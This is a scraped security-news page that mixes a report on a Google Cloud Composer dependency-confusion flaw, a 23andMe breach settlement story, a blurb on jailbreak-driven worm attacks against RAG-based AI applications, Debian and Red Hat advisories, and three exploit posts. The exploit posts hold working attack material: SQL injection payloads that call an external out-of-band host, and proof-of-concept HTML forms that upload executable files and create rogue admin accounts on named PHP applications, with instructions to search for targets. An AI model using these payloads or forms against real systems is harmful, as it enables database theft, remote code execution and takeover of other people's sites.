A now-patched critical security flaw impacting Google Cloud Platform (GCP) Composer could have been exploited to achieve remote code execution on cloud servers by means of a supply chain attack technique called dependency confusion.
The vulnerability has been codenamed CloudImposer by Tenable Research.
"The vulnerability could have allowed an attacker to hijack an internal software dependency

Cloud Security / Vulnerability

A now-patched critical security flaw impacting Google Cloud Platform (GCP) Composer could have been exploited to achieve remote code execution on cloud servers by means of a supply chain attack technique called dependency confusion.

The vulnerability has been codenamed **CloudImposer** by Tenable Research.

"The vulnerability could have allowed an attacker to hijack an internal software dependency that Google pre-installs on each Google Cloud Composer pipeline-orchestration tool," security researcher Liv Matan said in a report shared with The Hacker News.

Dependency confusion (aka substitution attack), which was first documented by security researcher Alex Birsan in February 2021, refers to a type of software supply chain compromise in which a package manager is tricked into pulling a malicious package from a public repository instead of the intended file of the same name from an internal repository.

So, a threat actor could stage a large-scale supply chain attack by publishing a counterfeit package to a public package repository with the same name as a package internally developed by companies and with a higher version number.

This, in turn, causes the package manager to unknowingly download the malicious package from the public repository instead of the private repository, effectively replacing the existing package dependency with its rogue counterpart.

The problem identified by Tenable is similar in that it could be abused to upload a malicious package to the Python Package Index (PyPI) repository with the name "google-cloud-datacatalog-lineage-producer-client," which could then be preinstalled on all Composer instances with elevated permissions.

While Cloud Composer requires that the package in question is version-pinned (i.e., version 0.1.0), Tenable found that using the "--extra-index-url" argument during a "pip install" command prioritizes fetching the package from the public registry, thereby opening the door to dependency confusion.

Armed with this privilege, attackers could execute code, exfiltrate service account credentials, and move laterally in the victim's environment to other GCP services.

Following responsible disclosure on January 18, 2024, it was fixed by Google in May 2024 by ensuring that the package is only installed from a private repository. It has also added the extra precaution of verifying the package's checksum in order to confirm its integrity and validate that it has not been tampered with.

The Python Packaging Authority (PyPA) is said to have been aware of the risks posed by the "--extra-index-url" argument since at least March 2018, urging users to skip using PyPI in cases where the internal package needs to be pulled.

"Packages are expected to be unique up to name and version, so two wheels with the same package name and version are treated as indistinguishable by pip," a PyPA member noted at the time. "This is a deliberate feature of the package metadata, and not likely to change."

Google, as part of its fix, now also recommends that developers use the "--index-url" argument instead of the "–extra-index-url" argument and that GCP customers make use of an Artifact Registry virtual repository when requiring multiple repositories.

"The '--index-url' argument reduces the risk of dependency confusion attacks by only searching for packages in the registry that was defined as a given value for that argument," Matan said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Google Fixes GCP Composer Flaw That Could've Led to Remote Code Execution

Whitepaper called Unleashing Worms and Extracting Data: Escalating the Outcome of Attacks against RAG-based Inference in Scale and Severity Using Jailbreaking. In this paper, the authors show that with the ability to jailbreak a GenAI model, attackers can escalate the outcome of attacks against RAG-based GenAI-powered applications in severity and scale.

Unleashing Worms And Extracting Data

Genetic testing company 23andMe will pay $30 million over a 2023 data breach which ended in millions of customers having data exposed.

Genetic testing company 23andMe will pay $30 million to settle a class action lawsuit over a 2023 data breach which ended in some customers having information like names, birth years, and ancestry information exposed.

In October 2023, we reported on how information belonging to as many as seven million 23andMe customers turned up for sale on criminal forums following a credential stuffing attack against 23andMe.

23andMe said that cybercriminals had stolen profile information that users had shared through its DNA Relatives feature, an optional service that lets customers find and connect with genetic relatives.

In December 2023, 23andMe admitted that some genetic and health data might have been accessed during that breach. To dodge responsibility, the company wrote a letter to legal representatives of those affected by the breach, laying the blame at the feet of victims themselves.

23andMe also neglected to tell customers with Chinese and Ashkenazi Jewish ancestry that the cybercriminal appeared to have specifically targeted them, posting their information for sale on the dark web.

In January 2024, customers filed a class action lawsuit against 23andMe in a San Francisco court, alleging the company failed to protect their privacy. The result of that lawsuit is the settlement.

What immediately jumped out in the settlement is the title of one of the chapters:

> “THE SETTLEMENT IS THE RESULT OF ZEALOUS ADVOCACY AND SKILLFUL NEGOTIATION”

What does that mean? Well, the $30 million is apparently all that 23andMe can afford to pay. And that’s only because the expectation is that cyberinsurance will cover $25 million.

The market value of the company has plummeted, and revenue declined. This decline had already set in prior to the incident, but it definitely didn’t help to improve the situation.

The court has not yet approved the settlement, but it’s expected that 23andMe will pay $30 million into a fund for customers whose data was compromised, as well as provide them with identity and genetic monitoring.

Other countries, like Canada and the UK have announced they will undertake a joint investigation into the data breach.

According to Malwarebytes’ data, over 3 million people were affected by the data breach, so none of the victims should expect to get rich because of this settlement.

On the dark web, the data is offered for sale in three separate data sets. A general set that includes 2,763,569 records, one belonging to Ashkenazi-based users (835,708 records), and one allegedly belonging to China-based users of 23andMe (68,541 records).

If you want to find out if your personal data was exposed through this breach, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you used to register and 23andMe) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 23andMe to pay $30 million in settlement over 2023 data breach 

Debian Linux Security Advisory 5769-1 - Multiple issues were found in Git, a fast, scalable, distributed revision control system, which may result in file overwrites outside the repository, arbitrary configuration injection or arbitrary code execution.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5769-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoSeptember 13, 2024                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : gitCVE ID         : CVE-2023-25652 CVE-2023-25815 CVE-2023-29007 CVE-2024-32002                 CVE-2024-32004 CVE-2024-32020 CVE-2024-32021 CVE-2024-32465Debian Bug     : 1034835 1071160Multiple issues were found in Git, a fast, scalable, distributedrevision control system, which may result in file overwrites outside therepository, arbitrary configuration injection or arbitrary codeexecution.For the stable distribution (bookworm), these problems have been fixed inversion 1:2.39.5-0+deb12u1.We recommend that you upgrade your git packages.For the detailed security status of git please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/gitFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmbklgFfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0QD9RAAiN4YarOU7lbe6MnW4vRpz1qJA4ph8WgtqRs5GKgMUBOPcLCCqDim/9Ylvib6iaH/8WW5Rh9TDXY5BuWZ/Ek5zU9oDcde2E3r4VUJDKdSICjyBpooc5iLsJpTjh8lHio+UjrNqBqoLAtyarCsj1muvO8l/f96O6qotP/wUJVqZfAyCpHFeeApzj7MdXWNt/j5YBSiu7dwZY+p0E1cKwGglJtZnUCcyJaelnLd6Igu2Lq+4OvuhqWhsmeEaDauOY43WA7Qwpu814XJG9lrMAyWZJFWnT/NEGYi0dm2vhbZzoS4V/WvCmtfyrCJlkXzKgG737YMpI99T7eP75BhSF6dw8aC5HCT6cG5Gv1apEhVC2hMIVot3ZVL/7ojml972rjltmMMgILStR7N9JWrDqXPpn8SWslwjMLfxHslZzG3YGJV5ihXtvefWafH7c0X7WVT1yTdE1FrTOnCIUfPc/J+jEXMWNd+vsV3aHdVVdZoHj8bDso47CZqMYwTa2Q0opuv+4CDnuG1wUZzv4ap1w21C36tSwIZ1u8CEMhyYzdZV7TUf/0XsDNsms2ewRNmEWXHGvxsw1+wdTpFeb9iahoGTfcDPq3gdr4W74yRn5ZryREu6G2C0zGMaPkfyjGcnDiHTGsET2qxX5Je0iTsLraWbLAB0iyHmABzsDCn/pJc7lE==iG6s-----END PGP SIGNATURE-----

Debian Security Advisory 5769-1

Red Hat Security Advisory 2024-6667-03 - Red Hat OpenShift Dev Spaces 3.16 has been released.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6667.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat OpenShift Dev Spaces 3.16.0 release  
Advisory ID:        RHSA-2024:6667-03  
Product:            Red Hat OpenShift Dev Spaces  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6667  
Issue date:         2024-09-14  
Revision:           03  
CVE Names:          CVE-2021-0341  
====================================================================

Summary: 

Red Hat OpenShift Dev Spaces 3.16 has been released.

All containers have been updated to include feature enhancements, bug fixes and CVE fixes.

Following the Red Hat Product Security standards this update is rated as having a security impact of Important. The Common Vulnerability Scoring System (CVSS) base score is available for every fixed CVE in the references section.

Description:

Red Hat OpenShift Dev Spaces provides a cloud developer workspace server and a browser-based IDE built for teams and organizations. Dev Spaces runs in OpenShift and is well-suited for container-based development.

The 3.16 release is based on Eclipse Che 7.90 and uses the DevWorkspace engine to provide support for workspaces based on devfile v2.1 and v2.2.

Users still using the v1 standard should migrate as soon as possible.

https://devfile.io/docs/2.2.0/migrating-to-devfile-v2

Dev Spaces releases support the latest two OpenShift 4 EUS releases. Users are expected to update to newer OpenShift releases in order to continue to get Dev Spaces updates. 

https://access.redhat.com/support/policy/updates/openshift#crw

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-0341

References:

https://access.redhat.com/security/updates/classification/#important  
https://issues.redhat.com/browse/CRW-6868

Red Hat Security Advisory 2024-6667-03

Ship Ferry Ticket Reservation System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    ## Titles: SFTRS - PHP (by: oretnom23 ) v1.0 Multiple-SQLi### Bonus: FU + RCE & XSS - Information disclosure## Author: nu11secur1ty## Date: 09/14/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The `password` parameter appears to be vulnerable to SQL injection attacks.The payload '+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+' was submittedin the password parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get all theinformation from the database of this system, and he can do very maliciousaction against the owner of this application!STATUS: HIGH- Vulnerability for deprecation!WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR!https://github.com/oretnom23[+]Exploits:- SQLi Multiple:```mysql---Parameter: password (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT9033=9033 AND ('ehPW'='ehPW    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT(ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw---```## Reproduce:[href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html)## Time spent:00:17:00

Ship Ferry Ticket Reservation System 1.0 SQL Injection

Reservation Management System version 1.0 suffers from a cross site request forgery vulnerability.

=============================================================================================================================================  
| # Title     : Reservation Management System 1.0 CSRF Vulnerability                                                                        |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/reservation.zip                                       |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

  [+] Line 8 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="modal-content">  
            <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>  
              <h4 class="modal-title">Add New Menu</h4>  
            </div>  
            <div class="modal-body">  
                
              <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/menu_save.php" enctype="multipart/form-data">  
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Menu Name</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="menu" id="title" placeholder="Menu Name" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Category</label>  
                      <div class="col-lg-8">   
                        <select class="form-control select2" id="exampleSelect1" name="cat" required="">  
                                                         <option value="9">Dessert</option>  
                                                        <option value="6">Main Course</option>  
                                                        <option value="7">Pasta</option>  
                                                        <option value="10">Rice</option>  
                                                </select>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Subcategory</label>  
                      <div class="col-lg-8">   
                        <select class="form-control select2" id="exampleSelect1" name="subcat">  
                                                         <option>Drinks</option>  
                                                        <option>Lunch and Dinner</option>  
                                                        <option>Mirienda</option>  
                                                        <option>Non Combo Meal</option>  
                                                </select>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Description</label>  
                      <div class="col-lg-8">   
                        <textarea class="form-control" name="desc" id="title" placeholder="Description" required=""></textarea>  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Price</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="price" id="title" placeholder="Price" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Image</label>  
                      <div class="col-lg-8">   
                        <input type="file" class="form-control" name="image" id="title">  
                      </div>  
                  </div> 

                    
                  <div class="form-group">  
                        
                      <div class="col-lg-offset-2 col-lg-6">  
                        <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                        <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                       </div>  
                  </div>  
              </form>  
                
            </div>

                    </div>

    [+] Ev!L : http://127.0.0.1/reservation/images/shopping.php

-----------[+] Part 02 Add Admin [+]-------------------

[+] Line 8 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="modal-content">  
            <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>  
              <h4 class="modal-title">Add New User</h4>  
            </div>  
            <div class="modal-body">  
                
              <form class="form-horizontal" method="post" action="http://127.0.0.1/reservation/admin/user_save.php">  
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="title">Full Name</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="name" id="title" placeholder="Write Full Name of User" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="username">Username</label>  
                      <div class="col-lg-8">   
                        <input type="text" class="form-control" name="username" value="chimney_admin" placeholder="Write Username" required="">  
                      </div>  
                  </div>   
                    
                  <div class="form-group">  
                      <label class="control-label col-lg-2" for="password">Password</label>  
                      <div class="col-lg-8">   
                        <input type="password" class="form-control" name="password" id="password" placeholder="Write password" required="">  
                      </div>  
                  </div> 

                                                                        
                  <div class="form-group">  
                        
                      <div class="col-lg-offset-2 col-lg-6">  
                        <button type="submit" class="btn btn-sm btn-primary">Save</button>  
                        <button type="button" class="btn btn-default" data-dismiss="modal" aria-hidden="true">Close</button>  
                       </div>  
                  </div>  
              </form>  
                
            </div>

                    </div>  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Reservation Management System 1.0 Cross Site Request Forgery

Red Hat Security Advisory 2024-6663-03 - An update for kpatch-patch-4_18_0-305_120_1 and kpatch-patch-4_18_0-305_138_1 is now available for Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6663.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch-4_18_0-305_120_1 and kpatch-patch-4_18_0-305_138_1 security updateAdvisory ID:        RHSA-2024:6663-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6663Issue date:         2024-09-14Revision:           03CVE Names:          CVE-2024-41090====================================================================Summary: An update for kpatch-patch-4_18_0-305_120_1 and kpatch-patch-4_18_0-305_138_1 is now available for Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which can be loaded by the kpatch command line utility to modify the code of a running kernel.  This patch module is targeted for kernel-4.18.0-305.120.1.el8_4.Security Fix(es):* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-41090References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2299240https://bugzilla.redhat.com/show_bug.cgi?id=2299336

Red Hat Security Advisory 2024-6663-03

Online Job Recruitment Portal Project version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================  
| # Title     : Online Job Recruitment Portal project v1.0 Remote File Upload Vulnerability                                                 |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/php/12866/online-job-recruitment-portal-php-project-source-code                           |  
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code uploads a executable malicious file remotely .

[+] Go to the line 10.

[+] Set the target site link Save changes and apply . 

[+] infected file : rec_detail.php.

[+] save code as poc.html .

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Recruitment Form</title>  
</head>  
<body>  
    <h1>Recruitment Form</h1>  
    <form action="http://127.0.0.1/Recruitment-Portal-master/rec_detail.php" method="POST" enctype="multipart/form-data">  
          
        <label for="photograph">Photograph:</label>  
        <input type="file" id="photograph" name="photograph" required><br><br>

          
        <label for="placeofbirth">Place of Birth:</label>  
        <input type="text" id="placeofbirth" name="placeofbirth" required><br><br>

          
        <label for="fhname">Father's/Husband's Name:</label>  
        <input type="text" id="fhname" name="fhname" required><br><br>

          
        <label for="marital_status">Marital Status:</label>  
        <select id="marital_status" name="marital_status">  
            <option value="single">Single</option>  
            <option value="married">Married</option>  
            <option value="divorced">Divorced</option>  
        </select><br><br>

          
        <label for="Nationality">Nationality:</label>  
        <select id="Nationality" name="Nationality">  
            <option value="national1">Nationality 1</option>  
            <option value="national2">Nationality 2</option>  
        </select><br><br>

          
        <label for="handicapped">Handicapped:</label>  
        <select id="handicapped" name="handicapped">  
            <option value="yes">Yes</option>  
            <option value="no">No</option>  
        </select><br><br>

          
        <label for="religion">Religion:</label>  
        <select id="religion" name="religion">  
            <option value="religion1">Religion 1</option>  
            <option value="religion2">Religion 2</option>  
        </select><br><br>

          
        <label for="blood">Blood Group:</label>  
        <select id="blood" name="blood">  
            <option value="A+">A+</option>  
            <option value="B+">B+</option>  
            <option value="AB+">AB+</option>  
            <option value="O+">O+</option>  
            <option value="O-">O-</option>  
        </select><br><br>

          
        <label for="mark">Identification Mark:</label>  
        <input type="text" id="mark" name="mark" required><br><br>

          
        <input type="submit" value="Submit">  
    </form>  
</body>  
</html>

[+] http://127.0.0.1/Recruitment-Portal-master/images/.php

Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Online Job Recruitment Portal Project 1.0 Arbitrary File Upload

Red Hat Security Advisory 2024-6662-03 - An update for python-setuptools is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6662.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: python-setuptools security updateAdvisory ID:        RHSA-2024:6662-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6662Issue date:         2024-09-14Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for python-setuptools is now available for Red Hat Enterprise Linux 7 Extended Lifecycle Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Additional Changes:For detailed information on changes in this release, see the Red Hat Enterprise Linux 7-ELS Release Notes linked from the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://docs.redhat.com/en/documentation/red_hat_enterprise_linux/7-ELS/html/7-ELS_release_notes/indexhttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Latest News